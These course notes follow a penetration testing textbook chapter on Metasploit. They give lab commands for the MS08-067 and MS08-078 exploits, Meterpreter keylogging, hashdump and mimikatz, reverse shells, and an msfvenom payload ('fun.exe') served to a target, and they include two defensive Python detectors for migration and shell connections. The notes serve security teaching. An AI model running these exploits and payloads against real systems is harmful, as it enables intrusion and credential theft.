Ch 4: Metasploit

Following Chapter 4 of Georgia Weidman's Penetration Testing book.


Why Use Metasploit?


Starting Metasploit

Three Commands

The first command starts PostgreSQL, the database Metasploit uses. You don't need it for basic Metasploit functions, but with the database you can save scan results.

The second command differs from the textbook, because Kali 2 ships a different version of Metasploit than Kali 1 did.

The third command starts msfconsole, the interactive console interface to Metasploit.

service postgresql start
msfdb init
msfconsole

Help

help
help route

Finding Metasploit Modules

Online Search

http://www.rapid7.com/db/modules/

MS08-067 is a famous and very powerful Windows vulnerability. It was patched in 2008, but many systems remain vulnerable.

You can search for modules by

Search for MS08-067 -- notice that MS08-67 does not work.

Note the Module Name in the lower left of the image below.

Local Search

search ms08-067

info exploit/windows/smb/ms08_067_netapi
Note these items:

Details about these fields are at

https://github.com/rapid7/metasploit-framework/wiki/How-to-get-started-with-writing-an-exploit

Using an Exploit

use windows/smb/ms08_067_netapi


Setting Module Options

Show Options

show options

Attack Server 2008 Machine

set RHOST 192.168.119.129

show options
Default values are OK for the other options.


Payloads (or Shellcode)

We need to tell Metasploit what we want to do to the target.

Show Payloads

show payloads lists only the payloads compatible with the current exploit.
show payloads

Using Default Payload

If you don't choose one, Metasploit will sometimes choose a good default. For Linux targets, it's usually linux/x86/meterpreter/reverse_tcp.
exploit
This attack won't work on Windows Server 2008.

However, searching the Metasploit online database for "Windows 2008" finds this one:

MS08-078 Microsoft Internet Explorer Data Binding Memory Corruption

http://www.rapid7.com/db/modules/exploit/windows/browser/ms08_078_xml_corruption
use exploit/windows/browser/ms08_078_xml_corruption

show options

exploit
On the Windows 2008 target system, open IE and browse to the URL shown by Metasploit, as highlighted below:

Using Meterpreter

sessions shows open sessions

sessions -i 1 starts interaction with session 1

help shows Meterpreter commands

sessions

sessions -i 1

help

Migrating to Another Process

List processes with ps and find a good process to migrate to, so you'll retain control even if the user closes the browser.

"explorer" is a good process to use. You'll need its Process ID, which was 2176 when I did it, but will be different on your system.

ps

ps | grep exp

migrate 2176
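From the defender's side, migrate shows up as one process creating a thread inside another, which Sysmon records as Event ID 8 (CreateRemoteThread). The script below is an added example, not from the textbook or these notes: it flags cross-process thread creation from processes that have no business injecting, with a browser-to-explorer.exe case like the one above in the constructed sample. The pipe-separated record format and the allowlist are assumptions for this example; field names follow the Sysmon event, but the layout is invented here.

```python
"""Flag cross-process thread creation that resembles Meterpreter 'migrate'.

Added example. Records are a constructed, simplified rendering of Sysmon
Event ID 8 (CreateRemoteThread), one per line:
  <time>|<source_image>|<source_pid>|<target_image>|<target_pid>
"""

# Assumed allowlist: system processes that routinely create threads in
# other processes. Tune this to your own baseline.
KNOWN_INJECTORS = {
    r"C:\Windows\System32\csrss.exe",
    r"C:\Windows\System32\svchost.exe",
}

# Client-side programs that should never create threads in other processes.
CLIENT_APPS = {"iexplore.exe", "firefox.exe", "chrome.exe",
               "winword.exe", "excel.exe", "acrord32.exe"}

# Constructed sample: one benign csrss event, one browser process injecting
# into explorer.exe (PID 2176, as in the notes), one benign svchost event.
SAMPLE_EVENTS = r"""
09:14:01|C:\Windows\System32\csrss.exe|512|C:\Windows\explorer.exe|2176
09:15:22|C:\Program Files\Internet Explorer\iexplore.exe|3040|C:\Windows\explorer.exe|2176
09:15:23|C:\Windows\System32\svchost.exe|880|C:\Windows\System32\lsass.exe|640
"""


def parse_event(line):
    """Split one constructed record into a dict with typed PIDs."""
    time, src_img, src_pid, tgt_img, tgt_pid = line.strip().split("|")
    return {"time": time, "source_image": src_img, "source_pid": int(src_pid),
            "target_image": tgt_img, "target_pid": int(tgt_pid)}


def basename(path):
    """Last component of a Windows path, lower-cased for comparison."""
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(ev):
    """Return (severity, reason) for a suspicious event, or None if benign."""
    if ev["source_image"] in KNOWN_INJECTORS:
        return None
    src = basename(ev["source_image"])
    tgt = basename(ev["target_image"])
    reason = (f"{ev['time']}: {src} (pid {ev['source_pid']}) created a thread in "
              f"{tgt} (pid {ev['target_pid']})")
    if src in CLIENT_APPS:
        # A browser or document viewer injecting into another process is the
        # shape a migrate from a client-side exploit takes.
        return ("high", reason + "; client application injecting, likely session migration")
    if tgt in ("explorer.exe", "lsass.exe"):
        # Long-lived, always-present processes are the usual migrate targets.
        return ("high", reason + "; common migration target")
    return ("medium", reason)


def scan_events(text):
    """Evaluate every non-empty record and return the list of findings."""
    findings = []
    for line in text.splitlines():
        if line.strip():
            result = evaluate(parse_event(line))
            if result:
                findings.append(result)
    return findings


if __name__ == "__main__":
    for severity, reason in scan_events(SAMPLE_EVENTS):
        print(f"[{severity}] {reason}")
```

Once the session has moved, explorer.exe owns the network connection, so responders who only look at the browser process will miss it; pair this event with the connection data for the target PID.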

Gathering Information

sysinfo

keyscan_start

keyscan_dump

screenshot

hashdump

getuid

getsystem

load mimikatz

kerberos

Exiting from Meterpreter

exit

sessions


Types of Shells

Bind Shells

A bind shell starts a listener on the target, on a specified port such as 4444.

It will fail if the target is behind a firewall that blocks unused inbound ports, which is usually the case.

Reverse Shells

The target makes an outgoing connection back to the attacker. This is much more likely to succeed than a bind shell, especially when the attacker's listening port is a common one like 80 or 443, because outbound traffic to those ports is rarely blocked.


Setting a Payload Manually

Reverse TCP

set payload windows/shell_reverse_tcp

show options

ifconfig

exploit
This exploit has two network configurations: one for the module (the Web server delivering the exploit), and one for the reverse shell payload. Both have reasonable default values.

In my case, port 4444 was busy and I had to move to another port.

sessions

sessions -i 2

exit

exit


Msfcli is Gone

Msfcli was deprecated and replaced by "msfconsole -q -x".

Its purpose is to run an exploit from a single command line, which makes exploits easier to test and script.

MS08-078 One-Liner

msfconsole -q -x "use exploit/windows/browser/ms08_078_xml_corruption; exploit"

sessions

sessions -i 1

exit

exit
A more detailed example is here:

https://www.offensive-security.com/metasploit-unleashed/shell/


Creating Standalone Payloads with Msfvenom

Getting Help

Msfvenom replaces the older msfpayload and msfencode commands.
msfvenom -h

Choosing a Payload

msfvenom -l payloads

msfvenom -l payloads | grep windows | grep meterpreter | grep reverse

Setting Options

The --payload-options switch shows the options, not "-o" as in the textbook.
msfvenom -p windows/meterpreter/reverse_tcp --payload-options

Choosing an Output Format

msfvenom --help-formats

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.130 -f exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.130 -f exe > fun.exe

cp fun.exe /var/www/html

service apache2 start

Using the Multi/Handler Module

We need to run a server for the target to connect to.
msfconsole

use multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

show options

ifconfig

set LHOST 192.168.119.130

exploit
On target system, download http://192.168.119.130/fun.exe and run it.
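The Types of Shells section above and this handler step describe the two connection patterns a defender has to recognise: a new listener on an unprovisioned port (bind shell) and an outbound connection from an unexpected process, either to the Metasploit default port 4444 or blended into 80/443 where port-based egress filtering alone will not catch it. The script below is an added example, not from the textbook or these notes, that applies both checks to constructed connection records. The comma-separated record format, the expected-listener set and the browser allowlist are assumptions for this example; real input would be collected from ss, netstat or an EDR.

```python
"""Flag connection records that look like bind or reverse shells.

Added example. Records are constructed for this example, one per line:
  <direction>,<process>,<local_port>,<remote_ip>,<remote_port>
where direction is LISTEN or OUTBOUND.
"""

# Assumed: ports this host is provisioned to listen on.
EXPECTED_LISTEN_PORTS = {22, 80, 443, 5432}

# Assumed: processes expected to make outbound web connections.
BROWSER_LIKE = {"firefox.exe", "iexplore.exe", "chrome.exe", "svchost.exe"}

# Constructed sample mixing normal traffic with the two shell types from
# the notes; fun.exe and the 192.168.119.130 handler address are the ones
# used in the msfvenom walk-through.
SAMPLE_LOG = """\
LISTEN,sshd,22,0.0.0.0,0
LISTEN,apache2,80,0.0.0.0,0
LISTEN,fun.exe,4444,0.0.0.0,0
OUTBOUND,iexplore.exe,51002,93.184.216.34,443
OUTBOUND,fun.exe,51010,192.168.119.130,4444
OUTBOUND,fun.exe,51011,192.168.119.130,443
OUTBOUND,svchost.exe,51012,13.107.4.50,80
"""


def parse_record(line):
    """Split one constructed record into a dict with integer ports."""
    direction, proc, lport, rip, rport = line.strip().split(",")
    return {"direction": direction, "process": proc, "local_port": int(lport),
            "remote_ip": rip, "remote_port": int(rport)}


def classify(rec):
    """Return a finding string, or None if the record looks normal."""
    if rec["direction"] == "LISTEN":
        # Bind shell: a listener appears on a port nobody provisioned.
        if rec["local_port"] not in EXPECTED_LISTEN_PORTS:
            return (f"bind-shell candidate: {rec['process']} listening on "
                    f"{rec['local_port']}")
        return None
    # Reverse shell to the Metasploit default handler port.
    if rec["remote_port"] == 4444:
        return (f"reverse-shell candidate: {rec['process']} -> "
                f"{rec['remote_ip']}:4444")
    # Reverse shell blending in on a web port: the port is allowed, so the
    # process making the connection is the only signal left.
    if rec["remote_port"] in (80, 443) and rec["process"] not in BROWSER_LIKE:
        return (f"reverse-shell candidate: {rec['process']} -> "
                f"{rec['remote_ip']}:{rec['remote_port']} "
                "(unexpected process on web port)")
    return None


def scan(log_text):
    """Classify every non-empty record and return the list of findings."""
    findings = []
    for line in log_text.splitlines():
        if line.strip():
            finding = classify(parse_record(line))
            if finding:
                findings.append(finding)
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The sample produces three findings: the 4444 listener, the connection to the handler on 4444, and the connection on 443 from a process that is not a browser. The last one is the case the notes say is "much more likely to succeed", and it is only visible because the record carries the process name, not just the port.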


Auxiliary Modules

Scanner HTTP Auxiliary Modules

https://www.offensive-security.com/metasploit-unleashed/scanner-http-auxiliary-modules/

Auxiliary Module Reference

https://www.offensive-security.com/metasploit-unleashed/auxiliary-module-reference/
Revised 9-14-17